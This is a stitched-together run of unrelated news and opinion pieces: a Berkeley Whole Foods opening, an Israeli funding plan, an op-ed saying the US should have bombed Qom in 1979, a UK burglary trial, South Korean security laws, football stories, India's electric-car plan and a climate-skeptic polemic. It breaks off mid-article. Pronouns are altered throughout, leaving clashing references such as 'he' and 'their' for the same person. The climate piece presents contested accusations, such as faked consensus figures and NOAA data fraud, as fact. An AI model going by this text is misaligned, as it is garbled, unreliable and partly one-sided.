Whole Foods is testing some new concepts at the new Berkeley location , including a designated space and table in the specialty food section where certified cheese professionals will be on hand to cut cheese fresh from the wheel to customers ' specifications .
“ Many delicate cheeses are better cut the day they are eaten , ” said Tantarelli . Up to 90 % of the cheeses come from Northern California .
Other features of the store are a full-service butcher , a bakery that will be making 10 breads from scratch daily , homebrew supplies , a craft pizza bar , a Paleo cold bar , and a sophisticated bulk-bin section .
The fresh juice bar has been given a Berkeley flavor — servers are mixing “ mocktails ” using ingredients from the locally situated Shrub & Co. Its drinks are made from organic fruit , sugar , vinegar and aromatics .
The new store has given Andronico 's an incentive to make improvements at its Solano Avenue store and to invest in a high-profile billboard campaign as the retailer reminds Berkeley shoppers that it has a long history in the area dating back to 1929 .
Renwood Opportunities Fund , Andronico 's owner since its bankruptcy in 2011 , is giving all five of its stores facelifts by mid-2015 . It has two in Berkeley , and three others : in San Anselmo , Los Altos and San Francisco . ( Update , Nov. 5 : Andronico 's said it spent around $ 1 million on the Solano store improvements and plans to spend several million more for all the other stores in 2015 . ) Two years ago it unveiled a revamped store in Berkeley 's Gourmet Ghetto .
“ We will be doing things like putting in new bakeries , new salad bars , hot food bars . We are really trying to clean them up . We are also revamping the stores ' catering departments , ” said the food retailer 's spokesperson .
“ Andronico 's is only in the Bay Area , so it is completely local , ” they said . “ We are hoping that people in Berkeley wo n't change stores , ” they added .
Andronico 's is particularly proud of the food it stocks from local producers , they said .
“ Andronico 's bends over backwards to make sure that it is opening the door to local companies . We carry hundreds of small producers . And we will allow for a lot of flexibility . ”
Andronico 's staff is unionized unlike Whole Foods , they added .
Whole Foods Gilman said 85 % of its produce is from California . It also has a section dedicated to hyperlocal food purveyors , including Baia Pasta , which is in Jack London Square , Oakland 's Sosu sauces , Emeryville 's INNA Jam , and San Francisco 's Omnivore Salt . Some of the products are made literally a stone 's throw from Whole Foods ' doorstep , such as Fra ' Mani ‘ s charcuterie , produce from Local Greens , drinks from Shrub & Co , and muffins from Muffin Revolution , the latter two being based at the Berkeley Kitchens incubator at 2701 Eighth St .
Asked whether the store will address local crime problems and traffic congestion , Tantarelli said the business is working to improve the area in collaboration with the community .
“ We will have security at the store for the safety of customers and team members . We have also been working with the police department , requesting more frequent patrols of the neighborhood . We are also discussing options with University Village [ in Albany ] for increased security , ” they said .
The food retailer has been welcomed by at least one major nearby business . Outdoor outfitter REI on San Pablo Avenue routinely works to build connections with the local community . With the stores being so close , this will increase , said Brad Bostrum , REI 's market manager of outdoor programs and outreach .
“ For us it 's fantastic . REI and Whole Foods are very like-minded companies . Even on our strategies with the best customer service , ” they said .
Are they worried about Whole Foods customers encroaching on REI car parking spaces ? “ We are more interested in how its arrival can affect the community in a positive way , ” said Bostrom . “ We expect a lot of our customers will overlap — for example people will grab a snack at Whole Foods before shopping at REI . ”
Bostrom said they are personally excited about the early-morning coffee that will be on offer .
As for Berkeley residents , they appear keen to give the retailer a try .
Neil Mishalov , who took some of the photos included in this story , lives a 7-minute walk from the new store . “ It 's fabulous . I am just delighted to have such a great food store within such a short distance from my home , ” they said after visiting on opening day .
Mercelle Carlson , a local mother of two and an enthusiastic foodie , said they would be visiting Whole Foods for its wine and cheese department as well as for its café .
With a 2-year-old and a little girl in elementary school , Carlson is often looking to pick up a few things after school drop-off in the morning . They are frustrated by retailers like Berkeley Bowl and Monterey Market , which do n't open until 9 a.m .
“ You try sitting in a café with a 2-year-old waiting until 9 a.m. for the stores to open , ” they said . “ At the moment , this earlier opening definitely give Whole Foods a competitive edge . The early bird gets the worm . ”
They hope Whole Foods ' hours will prompt some other local food retailers to change their opening times .
But Diane Yasuda , co-owner with husband Glenn of the much-loved Berkeley Bowl , said the Berkeley Bowl stores would n't be doing anything any different .
“ We will do what we do now . We will not be changing the hours at this point . There is business in food for everybody . We are so busy , more hours would be too much , ” they said .
Berkeley Bowl is hiring at the moment with a number of long-term employees retiring . The food retailer is also looking at ways of expanding its organic produce sections due to customer demand , said Yasuda .
The Berkeley Bowl owner said they thought Monterey Market might feel the competition from the new Whole Foods store .
“ It will help the area , ” they added .
The Natural Grocery Company is another local retailer watching Whole Foods ' arrival closely .
“ The Berkeley store will be affected by the new Whole Foods market but I still think it is a great thing if Whole Foods is actually selling organic natural food , ” said Pierre Jones , store manager of The Natural Grocery Company in El Cerrito , which also has a store on Gilman Street in Westbrae . Natural Grocery prides itself on its organic offerings , especially its fresh-produce department .
Tantarelli said at this time of year the fresh produce section at Whole Foods is 65 % organic . On average , about 50 % of the products it carries at any given time are organic store-wide . Whole Foods Market is a USDA certified organic grocer .
Related :
Allegro Coffee to open at new Berkeley Whole Foods ( 10.24.14 )
West Berkeley Phil Coffee now officially open ( 07.29.14 )
West Berkeley Whole Foods to open Nov. 4 ( 9.22.14 )
Farm Burger , Soccer Pro , Road Runner Sports to Berkeley ( 02.28.14 )
Whole Foods confirms it will open second Berkeley store ( 02.13.13 )
Andronico 's unveils rejuvenated Gourmet Ghetto store ( 11.09.12 )
Whole Foods likely to open second store in Berkeley ( 11.21.12 )
Revamped Safeway opens in heart of Gourmet Ghetto ( 10.05.12 )
Gilman Village : a Berkeley shopping area in transition ( 02.09.11 )
Subscribe to the free NOSH Weekly email which positively bursts with mouth-watering East Bay food news .
The government on Wednesday unanimously approved a NIS 15 billion ( $ 3.84 billion ) five-year plan to develop Israeli Arab and other minority communities in an effort to bring them up to par with the general population .
The plan by Prime Minister Benjamin Netanyahu , Finance Minister Moshe Kahlon and Social Equality Minister Gila Gamliel 's aims to “ advance a systematic and structural economic development plan for the minority sector , ” the Prime Minister 's Office said in a statement .
“ This is a significant addition designed to assist minority populations and reduce [ societal ] gaps , ” Netanyahu said . “ The plan will lead to the end of single-family home construction and a transition to high-rise construction , as exists throughout the country . At the same time , the plan will strengthen law enforcement in the minority sector with emphasis on illegal construction . ”
Get The Times of Israel 's Daily Edition by email and never miss our top stories Free Sign Up
The proposal will focus on Israel 's communities of Muslims , Druze , Christians and Circassians — members of a displaced ethnic group originating in the Caucasus , now spread across the Middle East , of which there are about 4,000 living in Israel .
Representatives of the minority communities worked with officials from the PMO and the two ministries to hammer out the details of the program .
Muslims , Druze and Christian Arabs make up slightly less than two million people , just under a quarter of the Israeli population .
Before the approval was agreed , some Likud ministers tried to insist that mixed Jewish-Arab communities should also benefit from the funding , leading to a heated row . The suggestion was ultimately not included in the final plan .
A widespread investment in education in the Arab sector as well as subsidies for public transport in minority communities are other key elements of the project .
President Reuven Rivlin , a strong advocate for minority rights , telephoned Netanyahu and Kahlon on Wednesday evening to congratulate them on passing the plan .
“ I congratulate you and the government upon this brave and significant decision , ” the president told Netanyahu . “ This is an important , and vital step on the road to closing the gaps which have existed for years . Clearly there is a long road ahead , but the government 's decision , under your leadership , represents a turning point , and an unprecedented confidence-building measure . ”
Gamliel asserted that the budget would finally give the Arab community its fair share of government funding .
“ This is an important and historic step on the way to reducing gaps and advancing social equality in Israel , ” Gamliel said . “ This is dramatic news ; for the first time , the government of Israel is changing the allocation mechanisms in government ministries so that Israel 's Arab citizens will receive their relative share in the state budget . ”
Leader of the Joint ( Arab ) List party MK Ayman Odeh welcomed the development , but warned that there still much that needed to be done for the Arab community .
“ The plan that was approved today is the result of a public campaign for many years [ and ] is still far from complete , ” they said .
“ We need to follow implementation of the plan . Even though we have a long history of disappointments in the past , and we have no illusions about the government 's racist policies , we hope we shall see the full implementation of the program . ”
The PMO said that within 30 days , a team under the auspices of the deputy attorney-general would submit recommendations to the cabinet for “ upgrading planning and construction ordinances . ”
For all their differences , President Barack Obama uncannily resembles their Democratic predecessor , President Jimmy Carter , in their stiff-necked , self-righteous inability to listen to others or to learn from experience or history . Against ferocious opposition at home and abroad , they are about to repeat the grievous mistake of appeasing Iran that Carter made over three decades ago and do even more geopolitical damage than the hapless peanut farmer wreaked in 1979 .
Recall the history . On February 1 , 1979 , two weeks after the cancer-ridden Shah of Iran left their country in the hands of a caretaker as they wandered the world in search of treatment , their fanatical opponent , Islamist cleric Ayatollah Ruhollah Khomeini , returned from their 14-year Parisian exile and within a week had engineered the overthrow of the shah 's feeble substitute and installed their own puppet regime . Not only did Iran 's Islamists hail the ayatollah 's return ; Carter 's United Nations ambassador , the painfully naïve Andrew Young , lauding Islam as “ a vibrant cultural force in today 's world , ” prophesied that the ayatollah himself—with ferocious indignation flashing from their eyes and bristling from their beard under their sharia-chic turban—would prove “ somewhat of a saint. ” On February 15 , the saintly imam began murdering Iran 's officer corps , and on April Fool 's Day , which they called “ the first day of a government of God , ” they declared their nation an Islamic republic . In mid-May , the U.S. Senate condemned Iran 's systematic slaughter of its officers , a rebuke Iran met by recalling its ambassador from Washington . By July , mullahs began publicly taking control of the government .
On October 22 , just when the Carter administration and the mullahs seemed to be finding a way to get along , the shah—his eagle-proud face pain-worn and their wasted body too small for their once-resplendent , Gilbert-and-Sullivan-ornate uniform—arrived in New York for cancer treatment . Less than two weeks later , on November 4 , a mob of “ students ” invaded and seized the American embassy in Tehran and took its 68 employees hostage , though they soon released the 15 women and African-Americans , and later set free another hostage suffering from multiple sclerosis . The other 52 Americans endured 444 days of captivity . How far the mullahs engineered this feat as retribution for America 's welcome of the shah is unknown ; their initial assurances that all would be well would prove consistent with Iran 's habitual double-dealing .
Carter 's initial response was entirely correct . On November 14 , a fleet of U.S. warships sped into the Indian Ocean . But then Carter entangled themselves in a bewildering web of fruitless international negotiations at the UN and the World Court , organizations whose keynote is cynicism and bad faith , and whose chief product is hot air not action .
What the president should have done , as was clear even then , was simple and traditional . They should have told the mullahs that they had 48 hours to release our citizens unharmed , or else we would leave not one stone standing on another in the “ holy ” city of Qom . We then should have leafleted the city with warnings to the population to flee . And , were the hostages not released , we should have done what we threatened to do . And were they not released at that point , we should have made the same threat against Tehran .
My own belief is that the initial threat would have succeeded . The mullahs would have said , “ Oh , you know how unruly these students are , how immature , how hot-headed ; but do n't worry . We will get them into line and get your citizens back to you . The embassy seizure shocked us as much as it did you . ”
But suppose I am wrong . Suppose the mullahs had defied Carter . Then we might have lost 53 of our countrymen and an untold number of Persians whom their tyrannical rulers might have held in the city as human shields . Being a world leader , however , sometimes requires making such harrowing choices . To prevent the powerful French fleet in Algeria from falling into Nazi hands after the 1940 Vichy surrender to Germany , British prime minister Winston Churchill ordered the Royal Navy to seize or sink it , if its commanders did not get it out of Nazi reach , thus protecting Britain 's vital mastery of the seas . A single pigheaded French admiral failed to choose any of the three honorable options Churchill offered . As a result , 1,297 innocent French sailors went to their watery graves after the British fleet opened fire on July 3 , with 977 dying in the first 15 minutes . Also as a result , skeptical Americans finally came to believe that Churchill was n't kidding when they said that the British would never surrender , and the U. S. government took a giant step closer to joining the war . As sociologist Max Weber warned , anyone who wants to keep their hands clean should stay out of politics , because politics ultimately rests on the force and violence necessary to repel force and violence against one 's countrymen . And force and violence , however legitimate and productive of ultimate good , also produce evil in the process .
So what good might have come from bombing Iran in 1979 ? The Persian people might have changed their government and spared themselves three decades of tyranny : a secular autocrat is generally better than a theocratic dictator for a Muslim people culturally unready for democracy—as the shah was better than the ayatollah , and as Egyptian president Abdel Fattah el-Sisi seems by a long chalk an improvement on the deposed Mohammed Morsi . From Iran 's warm welcome of the Shiite hijackers of an Alitalia jetliner a month before the American embassy seizure , right up to today , the mullahs have been avid supporters of Islamic terrorism , and with their enthusiastic backing of Hezbollah , they have become state sponsors of terrorism , as well . For more than a decade , the regime has been trying to make a nuclear weapon ; and the idea of nuclear-armed millenarian fanatics emerging as hegemons out of the Middle East 's current anarchy , sparking a nuclear arms race in that hair-trigger region , is unsettling , at best .
For the United States , bombing Iran in 1979 would have given the world proof of America 's resolve as a global superpower not to be attacked with impunity—as it was in the 1983 bombing of U.S. marine barracks in Lebanon , the 1993 World Trade Center bombing , or the al Qaida-directed bombing of the USS Cole in 2000 . That is the point of a superpower 's disregard of the shibboleth of “ proportionality ” in its response to adversaries : to show indomitable might and unshakable will . Who knows whether it might have discouraged the 2001 World Trade Center destruction ? But it 's my guess that Osama bin Laden learned their technique of recruiting followers by distributing audio tapes from Khomeini , who first organized the Iranian revolution using audio tapes sent from Paris . I 'm pretty sure I heard one of bin Laden 's tapes in a taxi driven by a man in full hajji garb on 9/8/2001 , and you did n't have to speak Arabic to understand its message of murderous hate .
So now President Obama wants to make an agreement that will ensure that Iran can produce an atom bomb essentially overnight . They have not seen fit to explain their reasoning to the American people , and it is hard to imagine what it might be . But all I can think of is Churchill 's rebuke to Prime Minister Neville Chamberlain when they returned from their infamous appeasement of Hitler in Munch in 1938 . “ You were given the choice between war and dishonor , ” Churchill thundered in Parliament . “ You chose dishonor , and you will have war. ” Certainly President Obama is choosing dishonor . What kind of war they might unleash , the world watches with dread .
Get the biggest daily news stories by email Subscribe Thank you for subscribing We have more newsletters Show me See our privacy notice Could not subscribe , try again later Invalid Email
When Carl Sinclair was ­confronted by a burglar at their home , their first instinct was to protect their family and property .
But the 47-year-old ended up being charged with attacking raider Hughie Hendry and spent the next 11 months fearing they were going to prison .
And the brave dad slammed the justice system after a jury took just 30 minutes to clear them of wounding the career criminal drug addict .
Carl , who lost their job as a railway safety manager because of the stress of their arrest last December , said they believed the case should never have even got to court .
Magistrates even increased their original charge of assault to wounding , which carries jail sentences of three years to life .
( Image : Glen Minikin )
Speaking of their nightmare year , they fought back tears as they said : “ I was never the criminal but my life has been left in tatters . I 'm just a dad and a husband who did what any man would do to protect their family .
“ Yet for 11 months I 've been made to feel like a nasty criminal and faced going to prison for a long time .
“ We would have lost our house and my family would have been on the streets as I would n't have been able to pay the mortgage .
“ How is that fair ? I stop a well-known thug attacking us and breaking into our home and we are left with the risk of losing everything we have worked so hard for .
( Image : Glen Minikin )
“ It sends out the completely wrong message to victims of a burglary .
“ It makes you feel like you ca n't defend yourself , your family or your property against these criminals .
“ The justice system is a farce and I dread to think how many thousands it has cost taxpayers .
“ It 's been 11 months of hell . I 'm just so glad it 's all over . ”
Carl confronted Hendry after the thief was heard trying the front door to their home in Doncaster , South Yorks , as he , wife Nicola , daughters Natalie , 20 , and Chelsea,16 , and 20-year-old son Ryan slept .
Nicola then looked out of the window and spotted the crook attempting to get into their car .
Speaking after their husband was found not guilty at Sheffield crown court , the secretary said : “ I instantly screamed for Carl , terrified what Hendry would do next . ”
Carl , who feared the yob was carrying a knife , rushed outside in just their boxer shorts clutching a lump hammer . They added : “ My first priority was my family and home . I had no thoughts for my safety . Hendry was on our pathway .
“ He squared up to me . All I was worrying about was my kids ' throats being cut . I was so scared . Instinct took over .
“ My main aim was to stop them pulling out a knife . I wrestled Hendry to the floor . I did punch them but just enough to stop them coming back to hurt me or my family . It was all over in 20 seconds . I shouted for Nicola to call the police. ” But when officers arrived , they were arrested .
( Image : Glen Minikin )
After being cleared , Carl , who has been burgled before , said : “ The relief was ­enormous . I was terrified I would be leaving the courts via a prison van .
“ Our whole life has been put on hold for nearly a year . The law needs to be changed . Victims should be protected not punished . ”
Hendry was jailed for eight weeks for interfering with the family 's car .
The Crown Prosecution Service said : “ We acknowledge and respect the decision the jury has reached . ”
SEOUL – The Justice Ministry will seek to devise proactive means for curbing “ anti-state ” and “ pro-enemy ” activities , such as those that support North Korea , it said Wednesday .
The justice ministry reported to President Park Geun-hye its new year 's plan to build up a legal foundation for prohibiting activities by , and the establishment of groups recognized as , anti-state and pro-enemy by the court .
Currently , there is no legal foundation to forcibly disband a group even if the court recognizes it as anti-state or pro-enemy .
A ruling party lawmaker in 2013 proposed an amendment to the National Security Law allowing authorities to dissolve such groups . The ministry will seek to support the amendment 's passage through the National Assembly .
The amendment , still pending in the Assembly , enables the government to order anti-state or pro-enemy groups disbanded , to force them to do so and to confiscate their properties if they do not comply .
The ministry said it will tighten its web-monitoring to preemptively cut off “ demagoguery ” . It will also look to strengthen cooperation with private IT companies for the sake of monitoring , it said .
One foreign observer decried the resolution as contrary to democratic principles .
“ Disbanding organizations for their beliefs is simply undemocratic , ” long-time Korea watcher Aidan Foster-Carter , honorary senior research fellow at Leeds University , told NK News . “ The Ministry of Justice should not be in the business of Thought Police . ”
However , the amendment enjoys some support , particularly in some South Korean media outlets :
“ … these anti-state/pro-enemy groups ' activities exceeds the level which liberal democracy tolerates , threatening the ( South Korean ) government , ” the South Korean JoongAng Ilbo argued in an editorial .
“ If it is acknowledged as pro-enemy , there should be a practical measure to stop it . At least it should be impossible to continue propaganda and support of the nuclear North Korea in the name of groups which ought to be dissolved . ”
Picture : Cheongwadae
Get the biggest Arsenal FC stories by email Subscribe Thank you for subscribing We have more newsletters Show me See our privacy notice Could not subscribe , try again later Invalid Email
Doing a speech at your own wedding is a daunting experience .
Standing up in front of everyone you know to tell them why your bride is amazing is tricky enough . Doing it in front of everyone you know AND YOUR NEW IN-LAWS is nigh on impossible - especially when you and your new father-in-law support different football teams .
That was the delicate situation facing Adam Tanous ahead of their own big day . Adam is a Chelsea fan . Their bride 's dad , Hughie , is an Arsenal fan . Not an ideal combination .
So , what did Adam do to win over their wife 's father as they became part of their family ? Did they publicly apologise for Cesc Fabregas ? Did they burn an image of Jose Mourinho in front of the entire wedding party ?
( Image : The Daily Mirror/Kent Gavin )
No and no . Incredibly , as you can see above , Adam got several Arsenal stars to film a personal message to Hughie , assuring them that their new Chelsea-supporting son-in-law is n't all that bad .
No , we are not making this up . Take a look at the clip above and see for yourself .
Olivier Giroud does the talking , ably backed up by Alex Oxlade-Chamberlain , Joel Campbell and Per Mertesacker . The Frenchman addresses Hughie directly , telling him :
`` I know they might be a Chelsea fan , but I assure you your daughter is in safe hands '' .
It 's an unbelievable scoop , which Adam was able to pull off thanks to their job as a PR . They work on Citroen 's partnership with Arsenal , so the club and the car manufacturer combined to make this happen as a special wedding present .
`` Citroen and Arsenal were working on a series of feel good messages to fans with my agency , Performance Communications , '' Adam tells us . `` When I found out , I saw an opportunity - so I asked to be a part of it .
`` Fortunately the idea was accepted and it went down an absolute storm on the day . It was one of those money ca n't buy moments and added to what was already an unbelievable day '' .
Pretty cool , huh ?
Well played , Arsenal !
A man charged with accidentally shooting another man to death Friday night in a Hyde Park neighborhood apartment was ordered held on $ 900,000 bond Saturday .
Paris D. Walker-Rush , 25 , is charged with involuntary manslaughter and unlawful use of a weapon by a felon , according to Chicago Police .
At about 9 p.m. , officers found 24-year-old David Kennedy unresponsive with a gunshot wound to the head inside an apartment in the 5200 block of South Cornell , police and the Cook County medical examiner 's office said .
Kennedy , of the 3700 block of South Wood , was pronounced dead at the scene at 10:45 p.m. , according to the Cook County medical examiner 's office . An autopsy performed Saturday ruled their death a homicide .
A police source said the men were playing with the gun and it appears the shooting may have been accidental .
Walker-Rush , who lives on the same block where the shooting occurred , was arrested without incident at the scene immediately following the shooting , according to police .
Walker-Rush was ordered held on $ 900,000 Saturday , court records show .
Their next court date was not immediately known .
Copyright SunTimes
“ Hoist by their own petard . ”
This is the phrase Shakespeare invented for “ being blown up by your own bomb. ” It 's also the perfect description for what has happened to one of the RICO 20 – the climate alarmist tenured professors who wrote to President Obama last year demanding that they use racketeering laws to prosecute climate “ deniers . ”
The RICO plan of attack was devised by the green activist Senator Sheldon Whitehouse . It has since been controversially endorsed by Attorney General Loretta Lynch who admitted earlier this week that the matter had been “ discussed ” by the Department of Justice and “ referred to the FBI . ”
But if the courtroom exchange below is anything to go by , using lawfare to harass skeptics is going to backfire horribly – and for a very simple reason . All the fraudulent and dishonest behaviour to do with “ global warming ” has been committed not by the skeptics but by climate alarmists .
What 's quite astonishing – not to mention squirm-inducingly embarrassing but also deliciously enjoyable in a Schadenfreude-on-steroids kind of way – is just how completely unaware of their own weakness these climate alarmists are .
Consider Specimen A . Their name is Professor Edward Maibach , they run the Center for Climate Change Communication at George Mason University ( GMU ) , and is the guy who actually drafted the RICO 20 letter calling for the legal pursuit of climate skeptics .
Unfortunately one of the big mistakes they made was writing the letter on GMU headed note paper rather than in a private capacity . This gave the Competitive Enterprise Institute the perfect excuse to bring a FOIA case in order to “ obtain documents shedding light on how taxpayer-funded professors used their public positions and resources in this campaign . ”
The result was the extremely sticky exchange below as Maibach was cross-examined by petitioners Chris Horner and Matthew Hardin , as relayed by Watts Up With That ?
( If wading through the transcripts is too much just skip past and I 'll explain what 's so utterly hopeless about the Warmist position )
Q . So what you 're telling me is , while you 're not aware of the specifics of RICO and how the law works , you think that what ExxonMobil specifically was doing was troubling and you wanted that stopped ? A . Correct . Q . So what is climate denial ? I 'll ask that .
A . What 's climate denial ? Good question . Activities that are intentionally misrepresenting what is known to be true about climate change so as to convince people that climate change is not , in fact , a reality . Q . So climate denial broadly bothers you then ?
A. Mischaracterization of the truth specifically intended to undermine the public 's well-being , yes , typically does bother me . Q . Can you give me an example of these misrepresentations by ExxonMobil or others ?
A . No , not off the top of my head . … Q . So you believe that someone knowingly misrepresent a risk posed by climate change merits investigation ?
A . Yes , I do . Q . Okay . So if someone , for example , were to knowingly hide data indicating an increase in temperatures over the years , that would merit investigation ?
A . Say it again , please .
Q . If someone were to hide or misrepresent or deceive the public relating to data which showed an increase in global temperatures over time , that would merit investigation ? A . It would be — I suppose it depends on who it is . But , yes , it would certainly be a deception . And as such , it would be an act that , in my view , ought to be exposed . … Q . So you said hiding an increase in temperatures would be a knowing deception , depending on who it is . I believe that 's what you said a minute ago ; is that correct ?
A . Sure .
Q . What if you knowingly hid a decrease in 20 global temperatures ? Would that be a knowing deception ?
A . Sure . … Q. I have one question — I 'm sorry , Thomas , and Professor Maibach — I forgot .
I want to follow up on one thing . Mr. Hardin had asked you about individuals , if they knowingly deceived the American — is – knowingly deceived the American people about the risk of climate change is the offense or what warrants investigation , right ?
A . In my view .
Q . Okay . So if Christy and Spenser [ sic ] — they keep the satellite temperature record . If they were found to have increased — I 'm sorry , not increased — hidden an increase in the temperature in the satellite record , would that warrant investigation as knowingly deceiving the American people ? A . They — they as individual climate scientists , if they are fudging their data , then I would say , yes , that would be investigation worthy .
But I would n't think that that would be investigation worthy by the Federal Government . I would think it would be investigation worthy by their funders or by the journals that had published their work . MR. MONCURE : You 've already made it clear that you 're not an expert on RICO . A . Correct .
MR. HORNER : But they are an expert on what they wrote . He 's the world 's leading expert on what they wrote . And they wrote that , “ knowingly deceiving the American people about the risk of climate change warrants investigation. ” BY MR. HORNER : Q . And I 'm saying , it 's not just — I mean , of all the people who know , it would seem to be climate scientists as opposed to CEOs is my premise . So as opposed to going after CEOs , how about a scientist ? If they knowingly deceived the public by hiding an increase in temperatures , does that also warrant investigation ? That 's my question .
A . It does .
Q . Okay . What if they hide a decline in 6 temperatures ? Does that warrant an investigation ?
A . Any knowing deception warrants – in science warrants an investigation .
Here 's the key : this GMU climate communication Professor Maibaich has been coaxed into admitting , under oath , that their own side should be investigated for climate fraud . ( It is , after all , climate alarmist scientists from NOAA who have been caught fudging data to hide the “ Pause ” , not climate skeptics )
They have also admitted that they drafted that RICO letter without knowing how RICO laws operate and without knowing precisely what kind of offense the “ deniers ” they wanted punished were actually guilty of . It appears , reading elsewhere through the court transcript , that they are n't even aware that the “ 97 per cent ” consensus figure is a much-debunked fabrication .
Like the Dimock water trial – this case is a spectacular own goal for the alarmists .
It reminds us of something I 've often remarked on before : the cabal of activists , scientists , academics , shyster politicians and hacks promoting the global warming agenda are quite astonishingly low grade . They 're low grade morally – which you 'd expect – but they 're also so low-grade in terms of competence , credibility and intellect that it 's quite amazing how they manage to hold down their jobs . ( Probably because they mostly work in the public sector , would be my guess ) .
What 's really going to do for the Climate Alarmists in the end , I think , though , is not so much their stupidity or their venality but their arrogance and their complacency . They 're so spoilt by being part of a protected , padded , taxpayer-funded Establishment , so used to dismissing their opponents with appeals to authority , ad hominems and bully boy tactics that they 've completely lost sight of how weak their position is .
I noticed this in a recent debate with Buzzfeed science editor Tom Chivers . It became apparent that , in common with so many of the journalists who have been toeing the Warmist party line , they still think that we so-called “ deniers ” are just a bunch of science-denying kooks touting a bunch of wacko conspiracy theories . They clearly had n't grasped , for example , the significance of the NOAA scandal . ( And similar ones at NASA ) . When your guys have been caught out cheating and making stuff up and getting their predictions wrong , it 's not enough to go “ well the expert consensus is… ” . Sooner or later you 're going to have to address the charges being made against you – or surrender the field .
As for the case the alarmists are trying to bring against Exxon – my view is that this too will backfire , given that the evidence just does n't stack up .
That said , knowing the way big corporations tend to cave to all manner of greenmail , it would n't at all surprise me if Exxon were to try to settle such a piece of vexatious litigation out of court rather than force the alarmists actually to prove their nonsense case .
But it 's never going to work with skeptical scientists . Fred Singer , Richard Lindzen , Willie Soon , John Christy , Roy Spencer , Pat Michaels and the rest – these guys are never going to cave , first because they 've been toughened by years of harassment and vilification , and secondly because they 've got the science on their side .
The fundamental problem faced by the “ prosecute the deniers ” camp is very simple : the real denialism of science and hard evidence is all on the Alarmist side – and demonstrably so in a court of law .
Every car sold in India from 2030 will be electric , under new government plans that have delighted environmentalists and dismayed the oil industry .
It 's hoped that by ridding India 's roads of petrol and diesel cars in the years ahead , the country will be able to reduce the harmful levels of air pollution that contribute to a staggering 1.2 million deaths per year .
India 's booming economy has seen it become the world 's third-largest oil importer , shelling out $ 150 billion annually for the resource – so a switch to electric-powered vehicles would put a sizable dent in demand for oil . It 's been calculated that the revolutionary move would save the country $ 60 billion in energy costs by 2030 , while also reducing running costs for millions of Indian car owners .
Image : Bloomberg
India 's Energy Minister Piyush Goyal says the government will financially support the initiative for the first two or three years , but the production of electric vehicles will be “ driven by demand and not subsidy ” after that .
Image : Shutterstock
Air pollution a big problem in India
More than a million people die in India every year as a result of breathing in toxic fumes , with an investigation by Greenpeace finding that the number of deaths caused by air pollution is only a fraction less than the number of smoking-related deaths .
The investigation also found that 3 % of the country 's gross domestic product was lost due to the levels of toxic smog .
In 2014 , the World Health Organization determined that out of the 20 global cities with the most air pollution , 13 are in India .
Efforts have been made by the country 's leaders to to improve air quality , with one example coming in January 2016 when New Delhi 's government mandated that men could only drive their cars on alternate days depending on whether their registration plate ended with an odd or even number ( single women were permitted to drive every day ) .
While such interventions have enjoyed modest success , switching to a fleet of purely electric cars would have a much greater environmental impact .
Indeed , it 's been calculated that the gradual switch to electric vehicles across India would decrease carbon emissions by 37 % by 2030 .
Oil firms facing uncertain future
As India 's ambitious electric vehicle plans begin to take shape , oil exporters will be frantically revising their calculations for oil demand in the region .
In its report into the impact of electric cars on oil demand , oil and gas giant BP forecast that the global fleet of petrol and diesel cars would almost double from about 900 million in 2015 to 1.7 billion by 2035 .
Image : BP
Image : EVvolumes.com
Almost 90 % of that growth was estimated to come from countries that are not members of the OECD ( Organisation for Economic Co-operation and Development ) , such as India and China .
China is also gearing up for a move away from gas-guzzling cars .
Last month , the Chinese confirmed they intend to push ahead with plans that will see alternative fuel vehicles account for at least one-fifth of the 35 million annual vehicle sales projected , by 2025 .
3 of 6
Another aspect of Bellamy 's compatibility that make them a perfect fit for what Liverpool are looking to do is obviously their desire to win trophies .
That 's why they came to Liverpool , and that 's why Kenny Dalglish was brought back as manager .
Craig Bellamy plays with a burning desire to win . They always have and they always will .
To try and temper that would be to take away from what has made them a such a good player for so many years . Bellamy 's not a nice guy on the pitch and that 's exactly what Liverpool need .
For far too long Liverpool have been far too nice and nice teams do n't win titles . You only need to look at Arsenal to see that . Liverpool need a nasty streak and Bellamy will bring that .
I 'm not talking about kicking players here , I 'm talking about standing up to the opposition and letting them know you 're not going to be pushed about .
Bellamy 's desire to win , work ethic and refusal to back down could also be the key to unlocking the enigma that has thus far been Andy Carroll . Carroll is Liverpool 's record signing and thus far has not lived up to their billing .
Liverpool fans will make excuses , blame injuries , bad luck and a lack of support from their team-mates . The truth is that Carroll 's bad performances and down to them and them alone because he 's simply not putting in the effort .
Carroll is playing games at a walking pace right now , putting in the minimal amount of effort , not chasing lost causes , not harassing defenders , not helping their team and giving their team-mates an earful when they fail to deliver the ball to exactly where they are standing .
If there is one player who will get on their case about this , it 's Craig Bellamy . Bellamy will not care that Carroll dwarves him . If they feel that the big man is not pulling their weight , Bellamy will get right in their face and let them know .
If Bellamy can take the fire that burns deep within him , and use it to light one under Carroll then Liverpool will start to see a return on their massive investment .
Carroll was highly motivated at Newcastle because they were playing for their boyhood team and as a result of that , they scored goals . That motivation seems to have been left behind on Tyneside when they made their move to Liverpool .
Carroll has a nasty streak inside that resembles that which Bellamy proudly wears on their sleeve . The two greatest England centre-forwards of all time , Nat Lofthouse and Alan Shearer have both had a nasty side to them which they were not afraid to use to get the better of defenders .
Liverpool hope Carroll can become the next great English centre-forward , they will need to use their nasty side if they want to live up to their expectations . Bellamy can teach them to do that .
Getting that motivation back into Carroll is half the battle . The other is finding the right partner for him . As I mentioned on the previous slide , I believe that right now that is Bellamy . It 's a partnership I 'm hoping we will see Liverpool use in the cup games as they keep the starting pair of Kuyt and Suarez rested for the league matches .
Bellamy can also act as something of a mentor for Carroll . There are a lot of similarities between the two . Both made big money moves at early ages to clubs were expectations ran high .
Obviously the £6million Newcastle paid for Bellamy is nothing in comparison to what Liverpool paid for Carroll , but at the time it did represent a pretty big investment in such a young player and it came with a lot of pressure .
At 22 Bellamy was a limited player with one primary weapon , just as Carroll is now . Bellamy 's pace was to them what ability in the air is to Carroll . Carroll has shown no improvement in any other aspect of their game .
If Bellamy can relay their own experiences on expanding their repertoire and improving their own all-round game to Carroll , then the young striker could start to develop into something resembling the top class striker Liverpool hoped they were buying .
JERUSALEM — The two teenage cousins met after school , discussed the tensions surrounding the Aqsa Mosque and other issues angering the Palestinians . They decided to avenge their grievances with knives .
The younger one , Ahmad Manasra , 13 , took a decorative six-inch blade from a cupboard in their parents ' bedroom , according to newly released legal documents . Hassan Manasra , 15 , armed themselves with a large kitchen knife . The pair then set off for a neighboring Jewish area of East Jerusalem .
